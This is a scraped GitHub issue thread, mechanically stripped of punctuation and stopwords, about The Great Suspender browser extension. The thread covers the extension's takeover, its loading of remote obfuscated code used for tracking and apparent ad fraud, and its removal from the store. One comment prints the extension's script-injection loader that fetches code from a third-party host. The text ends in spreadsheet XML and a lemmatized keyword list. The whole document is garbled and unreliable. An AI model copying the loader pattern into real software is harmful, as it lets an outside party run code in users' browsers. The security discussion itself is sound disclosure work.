removed edge malware v719 created without code code distributed store since november appear load compromised script however malicious maintainer remains control however introduce update time appears v719 listed store hostile v718 installed automatically receive malwareremoving update continued running hostile code google forcedisabled extension great suspender removed chrome store recover tabs issue continue reading code github repository currently safe recent tagged release happened transfer ownership version avoid needing finagle urls enable chrome developer mode download extract copy code navigate extensions menu select load unpacked extension others success simply pressing back button suspended tabs everyone note sites included suspended page pictorial guide comment want reload lost tabs form file history chromes user profile directory chrome closed restarting chrome using extension menu unsuspend tabs computer realizes extension banned malicious code loaded server extension version heavily obfuscated hard compromised however manage conduct successful analysis code reported passwordstealing functionality copies archived indeed highly unlikely extension would able steal passwords said theoretically plausible comment dont already highly recommend using password manager like bitwarden reduce difficulty changing passwords prevent site transmits stores password information insecure causing rest accounts compromised additionally enabling factor authentication wherever easy powerful make virtually impossible attacker data even managed retrieve passwords full description issue deanoemcke original developer chose step back extension june replacement maintainer chose unknown entity controls singlepurpose greatsuspender github account much suspicious change including mention payment opensource extension complete lack information maintainers identity however maintainer nothing several months believed simply failed transfer october maintainer updated chrome store package update raised flags users changelog modified created github investigation appeared extension connecting various thirdparty servers executing code lead users panic however closer investigation appeared thirdparty servers part alternative google analytics changes shipped along though unexplained tracking deactivation appears deactivation works would later discover wrong discussion continued however update also requested additional permissions including ability manipulate requests lets extension pleases including inserting blocking sites forcible redirects change supposedly order enable screenshot functionality unclear probably shouldnt needed furthermore store extension diverged github source minor change manifest shipped chrome store included github major concern though possible innocent explanation think illegal given license code violation minified script part extension license apply store rules extension unpacked inspected full humanreadable form likely satisfying copyleft restrictions final flag part store posting updated account deanoemcke remains listed maintainer privacy policy makes mention tracking maintainer several months since transfer almost nothing reflects change deanoemcke respond thread significant delay confirmed much including secret changes limited analytics disabled flag however hasnt clarified relationship basis trust maintainer explained initial post mentions purchase november lucasdf discovered smoking maintainer malicious although openwebanalytics legitimate software provide files executed extension hosted unrelated site owebanalyticscom turns immensely suspicious site created time update clearly designed appear innocent hosted public webhost given seemingly innocent homepage centos project however site contains real information tracking scripts appears purchased bitcoin found context extension importantly minified javascript differs significantly distributed project thibaudcolas done detailed analysis quick look quickly located additional hardcoded values related confirmed malicious extensions implying maintainer responsible also found incredibly suspicious additional information makes clear extension loading modified version trojan disguised based backend fakes using nodejs trojan sets cookies doesnt response certain requests completely different type legitimate furthermore joepie91 attempted deconstruct minified believes code intercepts requests meaning track perfectly furthermore manipulates requests makes additional advertising requests means author probably attempting commit several flavors advertising fraud well possibly tracking globally appeared innocent explanation longer remotely likely using chrome store version extension without disabling tracking executed code untrusted thirdparty computer power modify websites fact disabling tracking still works irrelevant given fact million users extension idea option even exists fact code malware meaningless light fact changed without notice minified humanunreadable fact version since pushed disables behavior isnt useful given future update reintroduicing malicious code occur without notifying user many users worried enough changes completely uninstalled extension preferring alternatives instead extension much fewer features slightly better performance others begun building source installing manually person create store release would need change significantly enough google wouldnt reject spam simply safe version removing modifying extension computer sure unsuspend tabs lose though original urls extracted extension querys working scripts easier avoid throughout discussions spanned several issues appear news articles maintainer never posted thread interacted repository despite ongoing discussion plotting destroy havent done anything assuage concerns likely hope aware attack would move eventually arent dead quite quick update extension microsoft removed malware deanoemcke reports maintainer might well literal keyboard amount interaction made community dont want continue using extension alternatives include tabs outliner lets place tabs outline auto discard similar however always reloads focused session buddy allows save tabs collections reviewed later well providing crashes enjoy using extension wish continue using download source code github repository version enable developer mode select load unpacked extension point directory running great suspender deanoemcke created aciidic gone creating repository control maintainer tracking code removed marvellous suspender another fork currently chrome store would prefer finagle developer mode settings concludes summary information please look thread original announcement analysis script placed additional sources began covering january picked february fourth bizarre reason probably nothing removal google edit edit details discussion edit update reflect newly discovered evidence malice edit note technique continue using edit urgent title people start noticing thanks twitter edit note thibaudcolas analysis edit note thibaudcolas second analysis clarify copyedit throughout start adding dates edits edit remind process removing extension note maintainer edit last today promise reformat edit list minor changes throughout edit note removal store edit bold edit help worried losing tabs nice bold letters edit details password edit clarify compromise beautify edit edit obscure fact made first edits months future edit years edit clarify probably breaches regret decision keep obsessive edit edit realize issue still contained false implication users safe november text updated successfully errors encountered rgalonso sbusch xxxforce dmuth csis0247 maxxyme poopooracoocoo spidify coreyward nivenranchhod reacted thumbs emoji sfcghafedorov mkiisoft nugentmichael arfatsalman mishaty tyleryep bibz0r ritvik1512 clearlythuydoan sudoalphax reacted thumbs emoji andreis gagebachik atlascomstock otaciliolacerda zimmertr hussamd cpeterso samtstern pjhampton guicheffer reacted laugh emoji thoroc henriquemor piyush panvourtsis shawntax strazto gadiener carpben simmimourya egxn reacted confused emoji nextdev65 nerdthened nadinenb khryseos0 geoff2k alescontrela nodraak rcsuax maciejcieslar danieljbrooks reacted heart emoji cehidalgo mkiisoft devoxel michealespinola fortran01 mishaty paulotijero prakharb5 reacted rocket emoji brainkim iolaum yakirgb mvolfik spixy coilysiren thibaudcolas berkant purestaketdb vincentploquien reacted eyes emoji reactions reactions reactions reactions reactions reactions reactions reactions calumapplepie mentioned issue upcoming changes management great suspender open referenced tracking deactivation open feature request clickable area doesnt reload suspended open feature request option show full suspended open extension update unsuspended active tabs windows open suspender annoying notification watching movie open screen capturing dont work v718 chrome versión build oficial bits open group open resources must listed webaccessibleresources manifest syslog open customisable suspended page line text maybe title open keeps opening update doesnt exist open unsuspends immediately suspending open update check causes youtube tabs unsuspendresume playing open great suspender greater popups open klbibkeccnjlkjkiokjodocebajanakg blocked open update lost several windows opening window lost tabs window open lost chrome groups todays update open suspended tabs reopened reverse order update open copy link xxxforce commented lead users panic however closer investigation appeared thirdparty servers part alternative google analytics changes shipped along though unexplained tracking deactivation appears deactivation works deanoemcke respond thread significant delay confirmed much including secret changes limited analytics disabled flag however hasnt clarified relationship basis trust maintainer explained initial post mentions purchase trckingbytecom trckpathcom part open analytics seeing deanoemcke post saying cant guarantee changes made legitimate analytics theyre malware expert legitimate analytics gathering deemed malware apologize possibly exacerbating panic asking trying little extra emphasis closer investigation appeared thirdparty servers part alternative google analytics strikes sounding little forgiving innocent though sure thats intent also want emphasize deanoemcke goes post giving publisher benefit doubt would right collect extra analytics long within googles policies communicated user privacy policy linked chrome webstore httpsgreatsuspendergithubioprivacy course assumes google aware changes also linked privacy policy still accurate know analytics communicated user violate established privacy policy violate googles policies information provided extensions page store inaccurate owner contact saying project open source privacy policy longer accurate deanoemcke previously assured sale announced project remain open source code github continue reflect code published chrome webstore although apparently cannot held responsible actions current owner extension said shouldnt make promises cant keep appreciate making issue themageking thank creating centralized location discussion topic hopefully reach users give information need order make decisions apologize realize much said simply repeating already provided felt need emphasize couple things personally reported extension chrome store october following extension sold unknown party entity updated extension v718 publishing changes github calling remote scripts using remote tracking analytics sending user information somewhere user knowledge please comment also comment owner refuses communicate respond anyone considered maliciousmalware point idea full changes code ramifications said changes also reported user greatsuspender main repository github october following personentity purchased chrome browser extension great suspender httpschromegooglecomwebstoredetailthegreatsuspenderklbibkeccnjlkjkiokjodocebajanakg million users project supposed open source master repository located httpsgithubcomgreatsuspenderthegreatsuspender announcement information regarding purchasetransfer located owner extension made changes code pushed update chrome store bringing version however published code changes github latest release httpsgithubcomgreatsuspenderthegreatsuspenderreleases obviously nano fiasco brought great deal warranted concern community despite many attempts many people refuse respond communicate anyone neither formeroriginal author discovered extension calling remote scripts please comment also comment extension injecting tracker violates privacy policy also linked chrome store stated httpsgreatsuspendergithubioprivacy privacy policy also updated reflect owner longer owns owner contact information might states extension uses google analytics project longer considered open source since owner refuses make source open available review belief personentity acting faith poses danger community every chrome user installs extension person every opportunity clarify going apparently interest transparency communication leaving reasonable person wonder purchase chrome extension remote code execution users knowledge code changes unpublished github pushed chrome store trackers injected violating privacy policy maxxyme spidify codeniko mjahan1936 nerdthened log2 hacfi tristor mcint madacol reacted thumbs emoji reactions reactions sorry something went wrong copy link author calumapplepie commented trckingbytecom trckpathcom part open analytics seeing deanoemcke post saying cant guarantee changes made legitimate analytics theyre malware afaik deans intention comment doesnt know user draws line analytics malware people might think sort analytics malware others might disagree trckingbytecom trckpathcom paths involved found extensions appear distributed great suspender comment thread explains related open analytics okay related hackers rewriting opensource software malicious purposes official part system apologize possibly exacerbating panic asking trying little extra emphasis closer investigation appeared thirdparty servers part alternative google analytics strikes sounding little forgiving innocent though sure thats intent actually open analytics system host owebanalyticscom really google analytics alternative code hosted github repo stars people elsewhere like reason said appears quite busy didnt time conduct sort detailed probe beyond website existed wasnt written poor english speaker also want emphasize deanoemcke goes post giving publisher benefit doubt would right collect extra analytics long within googles policies communicated user privacy policy linked chrome webstore httpsgreatsuspendergithubioprivacy course assumes google aware changes also linked privacy policy still accurate know analytics communicated user violate established privacy policy violate googles policies information provided extensions page store inaccurate owner contact saying project open source privacy policy longer accurate indeed biggest reason saying appear malicious actions major flags sufficiently suspicious justify scrutiny skepticism simple mistakes evidence actually malicious everything still well explained stupidity saying everything rosy major problems right doesnt appear start fearing safety passwords deanoemcke previously assured sale announced project remain open source code github continue reflect code published chrome webstore although apparently cannot held responsible actions current owner extension said shouldnt make promises cant keep yeah seems right appreciate making issue themageking thank creating centralized location discussion topic hopefully reach users give information need order make decisions apologize realize much said simply repeating already provided felt need emphasize couple things fair enough think edit post reflect personally reported extension chrome store october following reported store general rule google powers remediate github given source github innocent doubt much also respond comment thread condense discussion themageking comment reply ossilator comment regardless know wanted clear confusion extension directly connecting trck domains lacks permissions afaik sites definitely malicious hosted bitcoin hosting company found malicious extensions honestly nothing personal exactly problem know might able tell hedge quite javascript developer though comprehend perfectly well design manifests chrome applications understanding based reading documentation subject google requires websites extension connect independently specified manifestjson section understand control many sites listed including googleanalyticscom statsgdoubleclicknet google analytics sites cdnowebanalyticscom trck paths word trck even appear anywhere distributed code dont know certain short google developer stating otherwise completely unrelated note received email notification eastern time danupo commented looks like keypresseventhandler defined tries steal password external javascript addition getpassword function functions defined japanese prohibits putting part malware code could someone please check reason cannot find comment danupo whats notification however found evidence functions checked weird certain check event handler verify getpassword function defined mpql tris543 redteadev inactivist kissaki reacted thumbs emoji reactions reactions sorry something went wrong copy link xxxforce commented thanks themageking going stfu stop commenting entire situation obviously pissed whole thing incivility isnt deserved beneficial anyone genuinely apologize anyone else rude good luck calumapplepie dmuth poopooracoocoo nerdthened vetras colch dgomesbr griffinsauce mpql danw33 reacted thumbs emoji owenblacker xanderstrike delroh jerryaldrichiii mediomelonhub blaccod ntoskrnl4 ashishnitinpatil thelovesmith skplunkerin reacted heart emoji reactions reactions reactions sorry something went wrong copy link author calumapplepie commented fine pretty scary thing going dmuth poopooracoocoo nerdthened unixorn ckatsak colch dgomesbr markmonteiro mpql jasonseahshoppertise reacted thumbs emoji reactions reactions sorry something went wrong copy link skycafemix commented would like share decision worked answer quite well without thegreatsuspender hearing happened feel uncomfortable thegreatsuspender even though really enjoyed quick check shows domains bitcoin name strong attempt remain anonymous trust used thegreatsuspender along tabs outliner also love decided license author vladyslav volovyk found ukraine even though rumors posts extension site even quite recently abandonware lack responses found posts author elsewhere strikes okay honest programmer cannot hold someone want dedicate life something think abandonware decided trust thegreatsuspender works offline want automatic downloads extra functionality nonfree version bought tabs outliner version us14 visa card instant gratification even though week someone said could purchase chrome macbook works great automatic backup local google drive wanted post know converted tabs means going window unsuspending tabs outliner click close entire window maybe type note name window poof minimized windows gone started feeling lighter pages reopened internet obviously think even save downloaded page write notes bookmark tree seen chrome slowing everything surprising point started using safari parallel well saved 15gb according chrome task manager feel safer noticed actually tabs outliner even saves windows crashed long long time also thegreatsuspender links going ghost crashed window restoring clearing done fully deactivate uninstall thegreatsuspender hope experience helps tabs outliner works fine free mode never lost data though somewhere written chromes storage bulletproof rate feel quite happy decision think anyway getting unwieldy tabs good opportunity lose weight maxxyme adio0 deusovi colch ckyoog dennyguo33669 ayushappscrip fhwo13 pallas42 dharmaturtle ctimmerman reacted heart emoji reactions reactions sorry something went wrong copy link skycafemix commented storage bulletproof confirm windows suspended great suspender recently survive chrome crash unable restore frankly think idea tabs outliner superior even though doesnt cute anime eyes good luck everyone hope resolution found pruchaser turns clueless doubt injecting anything data along scary stuff mentioned others acceptable computer work feel better without reactions sorry something went wrong copy link dmuth commented concerning migrated away great suspender recommend tabs outliner good replacement bluephoenix pallas42 reacted thumbs emoji reactions reactions sorry something went wrong copy link maxxyme commented thanks guys think thats definitely kind extension looking heavy tabs contexts links open page adopt sure dmuth reacted thumbs emoji reactions reaction sorry something went wrong copy link evgzhabotinsky commented anyone concerned stealth tracking mirrored github reason always install source easy chromeextensions enable developer mode click load unpacked extension point folder repo done however dont current issue reason freak thirdparty loaded openwebanalytics able anything sure even loaded tick automatic deactivation kind tracking checkbox settings owabaseurl httpscdnowebanalyticscom owacmds owacmds function loadopenwebanalyticsversion owacmdspushtrackpageview function documentcreateelementscript owatype textjavascript owaasync true owasrc owabaseurl owamodulesbasejsowatrackercombinedlatestminifiedjssiteidklbibkeccnjlkjkiokjodocebajanakgapikey2cf3d852ab70d359456ce3a0aac237a3v version owas documentgetelementsbytagnamescript0 owasparentnodeinsertbeforeowa owas function init gsstoragegetoptiontrackingoptout loadgoogleanalytics window document script httpswwwgoogleanalyticscomanalyticsjs details chromeruntimegetmanifest loadopenwebanalyticsdetailsversion gsanalytics gsanalytics actual extension installed chrome store trackingoptout option checkbox loadopenwebanalytics isnt referenced anywhere else weird like might hardcoded siteid apikey maybe wanted experiment users machines else experiment tracking handled horrendously doesnt mean automatically malicious actually good spreads gets proven nothing malicious people might extension would donate personally going developer mode install option avoid tracking mostly autoupdaterelated issues developermode extensions dont autoupdated kenorb elevul extremeheat ctimmerman reacted thumbs emoji xxxforce compuguy savo92 seanhamlin technetium1 codyfitzpatrick xanderstrike mediomelonhub janejeon phibonacci reacted thumbs emoji ozanmuyes elevul reacted rocket emoji reactions reactions reactions reactions sorry something went wrong copy link evgzhabotinsky commented okay mentioned issue isnt affiliated openwebanalytics theory serve anything however still disabled checkbox technically dont think violating extension literally folder case repo cant without sources also functions substantially without thirdparty library enchoseon poopooracoocoo nulldev compuguy mpql technetium1 codyfitzpatrick reacted thumbs emoji reactions reactions sorry something went wrong calumapplepie changed title maintainer appears malicious maintainer probably malicious copy link author calumapplepie commented evgzhabotinsky violation stretch important needed poke maintainer extension store folder repo significant difference manifestjson torzsmokus reacted thumbs emoji reactions reaction sorry something went wrong hidden items load more… copy link justingolden21 commented agree someone throw marvelous suspender store could nobody else reactions sorry something went wrong copy link makedir commented agree someone throw marvelous suspender store could nobody else reactions sorry something went wrong copy link justingolden21 commented agree someone throw marvelous suspender store could nobody else someone mentioned store found though httpschromegooglecomwebstoredetailthemarvelloussuspendernoogafoofpebimajpfpamcfhoaifemoahlen longer comment discussion though skplunkerin parad0x reacted thumbs emoji reactions reactions sorry something went wrong copy link author calumapplepie commented longer comment discussion though probably either posted sometime around january fork github none published store could also buried somewhere wall text issues reactions sorry something went wrong copy link justingolden21 commented yeah makes sense tried marvelous suspender thing killing gaming desktop 32gb comfortably watching video entire thing stuttered video couldnt move mouse desktop even loud well turns marvelous suspender decided suspend like twenty tabs time nearly bricked machine almost minute hopefully time thing installing since tabs probably expired time need make suspend seconds previous something makedir reacted thumbs emoji skplunkerin reacted laugh emoji ctimmerman reacted rocket emoji reactions reaction reaction reaction sorry something went wrong copy link timetopanic commented timetopanic would recommend password manager instead schema leaks pattern guessed unbelievable long took automatically remove extension think couple months recommendation good password manager wont sell without even knowing shocked well took three months google disable browser done everyone else didnt even send warning primary account could possible data breaches research going seven months since wrote summary pregnancy almost ready come know quite bugs digital world enough vote still completely blows mind reason impression google kept close items offer store took nearly months remove pretty much shuttering google moving different provider various services unfortunate cant completely escape providing little money company possible future reactions sorry something went wrong copy link alvinlimucb commented email probably hundreds tabs snoozed marvelous suspender causes perpetual micro didnt problem great suspender back justin golden wrote yeah makes sense tried marvelous suspender thing killing gaming desktop 32gb comfortably watching video entire thing stuttered video couldnt move mouse desktop even loud well turns marvelous suspender decided suspend like twenty tabs time nearly bricked machine almost minute hopefully time thing installing since tabs probably expired time need make suspend seconds previous something receiving commented reply email directly view github comment unsubscribe httpsgithubcomnotificationsunsubscribeauthaf3bxfy54hxfav5x3hjakqlto3fcxancnfsm4ti37tgq reactions sorry something went wrong copy link aleqx commented edited private info already circulating dark countless leaks past ahead find mine thats load fearmongering tosh seems either watched much hollywood nonsense careless enough projecting private info already circulating dark countless leaks past even though many leaks happen including banks facebook others planet bigger tldr dont worry personal info leaked absolutely worry personal info leaked take good measures protect prevent personal info getting leaked thats people mugged houses getting broken nowadays blockfi leak least dont whore anyone asks many people getting extension disabled chrome months earlier like rest wonder people dont closerestart browser every laptops sleep apply manual updates months aphix ramrem28 reacted thumbs emoji reactions reactions sorry something went wrong copy link koolstr commented consider fearmongering think sensibly debate readily available everyones private info online knows look obviously dont careless personal info openly share willynilly wasnt suggesting point highlight private info gets world course treating personal info like sensitive data appropriate reactions sorry something went wrong copy link aleqx commented edited sensibly debate readily available everyones private info online baseless statements opposite sensible like said ahead find mine else stop narrative unhelpful best says anyone else private info gets world making unhelpful tone deaf statement despite pointed people kidnapped mugged houses broken online leaks everyone take personal data leaks seriously become aware private info getting leaked assess risk take action accordingly dont stay idle ignoring like keeps suggesting isnt spammed reactions sorry something went wrong copy link koolstr commented edited yeah makes sense tried marvelous suspender thing killing gaming desktop 32gb comfortably watching video entire thing stuttered video couldnt move mouse desktop even loud well turns marvelous suspender decided suspend like twenty tabs time nearly bricked machine almost minute hopefully time thing installing since tabs probably expired time need make suspend seconds previous something probably hundreds tabs snoozed marvelous suspender causes perpetual micro didnt problem great suspender back havent experienced marvellous suspender tons tabs guys autosuspend something reasonable like days also disable suspending memory screenshots timetopanic would recommend password manager instead schema leaks pattern guessed unbelievable long took automatically remove extension think couple months recommendation good password manager wont sell without even knowing shocked well took three months google disable browser done everyone else didnt even send warning primary account could possible data breaches research highly recommend bitwarden tried tons password managers best open source almost completely free solid full crossplatform compatibility optional cloud database vault accessible anywhere password sharing password generator full autofill autoupdate support technetium1 sudonova reacted thumbs emoji reactions reactions sorry something went wrong copy link koolstr commented sensibly debate readily available everyones private info online baseless statements opposite sensible like said ahead find mine else stop narrative unhelpful best says anyone else private info gets world making unhelpful tone deaf statement despite pointed people kidnapped mugged houses broken online leaks everyone take personal data leaks seriously become aware private info getting leaked assess risk take action accordingly dont stay idle ignoring like keeps suggesting measure youre suggesting taking personal info almost inevitably gets leaked point move home change name every single time service gets hacked isnt anything actionable part personal info leaked alongside everyone elses outside staying vigilant potential identity theft reactions sorry something went wrong copy link aleqx commented edited measure youre suggesting taking personal info almost inevitably gets leaked point move home change name every single time service gets hacked isnt anything actionable part personal info leaked alongside everyone elses outside staying vigilant potential identity the</t>
+          <t>The old maintainer appears to have sold the extension to parties unknown, who have malicious intent. In v7.1.8 of the extension, arbitrary code was executed from a remote server, which appeared to be used to commit a variety of tracking and fraud actions.</t>
         </is>
       </c>
       <c r="D153" t="inlineStr">
         <is>
           <t>https://github.com/greatsuspender/thegreatsuspender/issues/1263</t>
-        </is>
-      </c>
-      <c r="E153" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'greatsuspender', 'public', 'notification', 'star', 'issue', 'request', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'action', 'wiki', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'urgent', 'maintainer', 'malicious', 'open', 'calumapplepie', 'issue', 'comment', 'urgent', 'maintainer', 'malicious', 'calumapplepie', 'issue', 'comment', 'comment', 'link', 'maintainer', 'extension', 'party', 'unknown', 'malicious', 'intent', 'user', 'extension', 'advertising', 'fraud', 'extension', 'store', 'code', 'remote', 'server', 'used', 'commit', 'variety', 'tracking', 'fraud', 'action', 'edge', 'code', 'code', 'store', 'load', 'script', 'malicious', 'maintainer', 'control', 'update', 'time', 'store', 'update', 'hostile', 'code', 'extension', 'great', 'suspender', 'chrome', 'store', 'recover', 'tab', 'issue', 'code', 'repository', 'safe', 'recent', 'tagged', 'release', 'transfer', 'ownership', 'version', 'finagle', 'url', 'chrome', 'developer', 'mode', 'download', 'extract', 'copy', 'code', 'extension', 'menu', 'select', 'load', 'unpacked', 'extension', 'other', 'success', 'button', 'tab', 'site', 'page', 'pictorial', 'guide', 'comment', 'want', 'reload', 'tab', 'form', 'file', 'history', 'user', 'directory', 'chrome', 'chrome', 'extension', 'menu', 'unsuspend', 'tab', 'computer', 'extension', 'malicious', 'code', 'server', 'extension', 'version', 'successful', 'analysis', 'code', 'functionality', 'copy', 'unlikely', 'extension', 'able', 'password', 'plausible', 'comment', 'password', 'manager', 'bitwarden', 'difficulty', 'password', 'site', 'store', 'password', 'information', 'insecure', 'rest', 'account', 'factor', 'authentication', 'easy', 'powerful', 'impossible', 'attacker', 'datum', 'password', 'full', 'description', 'issue', 'original', 'developer', 'step', 'extension', 'replacement', 'maintainer', 'unknown', 'entity', 'suspicious', 'change', 'mention', 'payment', 'opensource', 'extension', 'complete', 'lack', 'information', 'identity', 'several', 'month', 'transfer', 'chrome', 'store', 'package', 'update', 'flag', 'user', 'investigation', 'extension', 'various', 'thirdparty', 'server', 'code', 'lead', 'user', 'close', 'investigation', 'thirdparty', 'server', 'part', 'alternative', 'analytic', 'change', 'unexplained', 'tracking', 'deactivation', 'deactivation', 'work', 'wrong', 'discussion', 'update', 'additional', 'permission', 'ability', 'request', 'extension', 'please', 'site', 'forcible', 'redirect', 'screenshot', 'functionality', 'unclear', 'store', 'extension', 'source', 'minor', 'change', 'manifest', 'chrome', 'store', 'major', 'concern', 'possible', 'innocent', 'explanation', 'illegal', 'license', 'code', 'violation', 'script', 'part', 'extension', 'license', 'store', 'rule', 'extension', 'full', 'humanreadable', 'form', 'copyleft', 'restriction', 'final', 'flag', 'part', 'store', 'account', 'maintainer', 'privacy', 'policy', 'tracking', 'several', 'month', 'transfer', 'change', 'thread', 'significant', 'delay', 'much', 'secret', 'change', 'limited', 'analytic', 'disabled', 'flag', 'relationship', 'basis', 'trust', 'maintainer', 'initial', 'post', 'mention', 'purchase', 'lucasdf', 'smoking', 'maintainer', 'malicious', 'openwebanalytic', 'legitimate', 'software', 'file', 'extension', 'unrelated', 'site', 'owebanalyticscom', 'suspicious', 'site', 'time', 'update', 'innocent', 'public', 'webhost', 'innocent', 'homepage', 'cento', 'project', 'site', 'real', 'information', 'tracking', 'script', 'bitcoin', 'context', 'extension', 'project', 'thibaudcola', 'detailed', 'analysis', 'quick', 'additional', 'value', 'malicious', 'extension', 'maintainer', 'responsible', 'suspicious', 'additional', 'information', 'clear', 'extension', 'version', 'backend', 'fake', 'set', 'cookie', 'certain', 'request', 'different', 'type', 'legitimate', 'deconstruct', 'code', 'intercept', 'request', 'track', 'request', 'additional', 'advertising', 'request', 'author', 'several', 'flavor', 'advertising', 'fraud', 'innocent', 'explanation', 'chrome', 'store', 'version', 'extension', 'tracking', 'code', 'untrusted', 'thirdparty', 'computer', 'power', 'website', 'fact', 'tracking', 'irrelevant', 'fact', 'user', 'extension', 'idea', 'option', 'fact', 'code', 'malware', 'meaningless', 'light', 'fact', 'notice', 'minified', 'humanunreadable', 'fact', 'version', 'behavior', 'useful', 'future', 'update', 'malicious', 'code', 'user', 'many', 'user', 'enough', 'change', 'uninstalled', 'extension', 'alternative', 'extension', 'few', 'feature', 'well', 'performance', 'other', 'source', 'manually', 'person', 'store', 'release', 'enough', 'spam', 'safe', 'version', 'extension', 'computer', 'unsuspend', 'tab', 'original', 'url', 'extension', 'querys', 'working', 'script', 'discussion', 'several', 'issue', 'news', 'article', 'thread', 'repository', 'ongoing', 'discussion', 'plotting', 'destroy', 'concern', 'aware', 'attack', 'dead', 'quick', 'update', 'extension', 'maintainer', 'literal', 'keyboard', 'amount', 'interaction', 'community', 'extension', 'alternative', 'outliner', 'place', 'tab', 'outline', 'auto', 'discard', 'similar', 'focused', 'session', 'buddy', 'save', 'tab', 'collection', 'crash', 'extension', 'wish', 'download', 'source', 'version', 'enable', 'developer', 'mode', 'select', 'load', 'unpacked', 'extension', 'point', 'directory', 'great', 'suspender', 'repository', 'control', 'tracking', 'code', 'marvellous', 'suspender', 'fork', 'chrome', 'store', 'finagle', 'developer', 'mode', 'setting', 'summary', 'information', 'thread', 'original', 'announcement', 'analysis', 'script', 'additional', 'source', 'fourth', 'bizarre', 'reason', 'removal', 'edit', 'detail', 'discussion', 'edit', 'update', 'evidence', 'malice', 'edit', 'note', 'technique', 'urgent', 'title', 'people', 'thank', 'twitter', 'edit', 'note', 'thibaudcola', 'analysis', 'edit', 'note', 'thibaudcola', 'second', 'analysis', 'clarify', 'copyedit', 'start', 'date', 'edit', 'remind', 'process', 'extension', 'note', 'maintainer', 'edit', 'last', 'today', 'reformat', 'edit', 'list', 'minor', 'change', 'edit', 'note', 'removal', 'store', 'bold', 'edit', 'help', 'tab', 'nice', 'bold', 'letter', 'detail', 'password', 'edit', 'compromise', 'beautify', 'edit', 'edit', 'obscure', 'fact', 'month', 'future', 'edit', 'year', 'regret', 'decision', 'obsessive', 'edit', 'edit', 'issue', 'false', 'implication', 'user', 'safe', 'text', 'error', 'csis0247', 'maxxyme', 'poopooracoocoo', 'spidify', 'coreyward', 'thumb', 'sudoalphax', 'thumb', 'atlascomstock', 'otaciliolacerda', 'panvourtsis', 'shawntax', 'nextdev65', 'nerdthened', 'heart', 'rocket', 'eye', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'reaction', 'issue', 'upcoming', 'change', 'management', 'great', 'suspender', 'open', 'deactivation', 'open', 'feature', 'request', 'clickable', 'area', 'open', 'feature', 'request', 'option', 'full', 'open', 'extension', 'update', 'unsuspended', 'active', 'tab', 'open', 'suspender', 'annoying', 'notification', 'movie', 'open', 'screen', 'capturing', 'chrome', 'versión', 'oficial', 'bit', 'open', 'group', 'open', 'resource', 'webaccessibleresource', 'syslog', 'open', 'customisable', 'page', 'line', 'text', 'title', 'open', 'update', 'open', 'unsuspend', 'open', 'update', 'check', 'tab', 'unsuspendresume', 'open', 'great', 'suspender', 'great', 'popup', 'open', 'klbibkeccnjlkjkiokjodocebajanakg', 'open', 'update', 'several', 'window', 'window', 'tab', 'window', 'open', 'chrome', 'group', 'open', 'tab', 'reverse', 'order', 'open', 'copy', 'link', 'lead', 'user', 'close', 'investigation', 'thirdparty', 'server', 'part', 'alternative', 'analytic', 'change', 'unexplained', 'tracking', 'deactivation', 'deactivation', 'work', 'thread', 'significant', 'delay', 'much', 'secret', 'change', 'limited', 'analytic', 'disabled', 'flag', 'relationship', 'basis', 'trust', 'maintainer', 'initial', 'post', 'mention', 'purchase', 'open', 'analytic', 'change', 'legitimate', 'analytic', 'expert', 'legitimate', 'analytic', 'gathering', 'panic', 'little', 'extra', 'emphasis', 'close', 'investigation', 'thirdparty', 'server', 'part', 'alternative', 'analytic', 'little', 'forgiving', 'innocent', 'sure', 'intent', 'post', 'publisher', 'benefit', 'doubt', 'extra', 'analytic', 'google', 'policy', 'user', 'privacy', 'policy', 'chrome', 'webstore', 'httpsgreatsuspendergithubioprivacy', 'course', 'aware', 'change', 'privacy', 'policy', 'accurate', 'know', 'analytic', 'user', 'privacy', 'policy', 'google', 'policy', 'information', 'extension', 'page', 'store', 'inaccurate', 'owner', 'contact', 'project', 'open', 'source', 'privacy', 'policy', 'accurate', 'sale', 'project', 'open', 'source', 'code', 'code', 'chrome', 'webstore', 'responsible', 'action', 'current', 'owner', 'extension', 'promise', 'issue', 'thank', 'centralized', 'location', 'discussion', 'topic', 'user', 'information', 'need', 'order', 'decision', 'much', 'need', 'couple', 'thing', 'extension', 'chrome', 'store', 'extension', 'unknown', 'party', 'entity', 'extension', 'publishing', 'remote', 'script', 'remote', 'tracking', 'analytic', 'user', 'information', 'user', 'knowledge', 'comment', 'owner', 'point', 'idea', 'full', 'change', 'code', 'ramification', 'change', 'user', 'greatsuspender', 'main', 'repository', 'personentity', 'extension', 'great', 'suspender', 'httpschromegooglecomwebstoredetailthegreatsuspenderklbibkeccnjlkjkiokjodocebajanakg', 'user', 'project', 'open', 'source', 'master', 'repository', 'httpsgithubcomgreatsuspenderthegreatsuspender', 'announcement', 'information', 'purchasetransfer', 'owner', 'extension', 'change', 'code', 'update', 'chrome', 'store', 'version', 'code', 'late', 'release', 'httpsgithubcomgreatsuspenderthegreatsuspenderrelease', 'nano', 'fiasco', 'great', 'deal', 'concern', 'community', 'many', 'attempt', 'many', 'people', 'formeroriginal', 'author', 'extension', 'remote', 'script', 'extension', 'tracker', 'privacy', 'policy', 'chrome', 'store', 'httpsgreatsuspendergithubioprivacy', 'privacy', 'policy', 'reflect', 'owner', 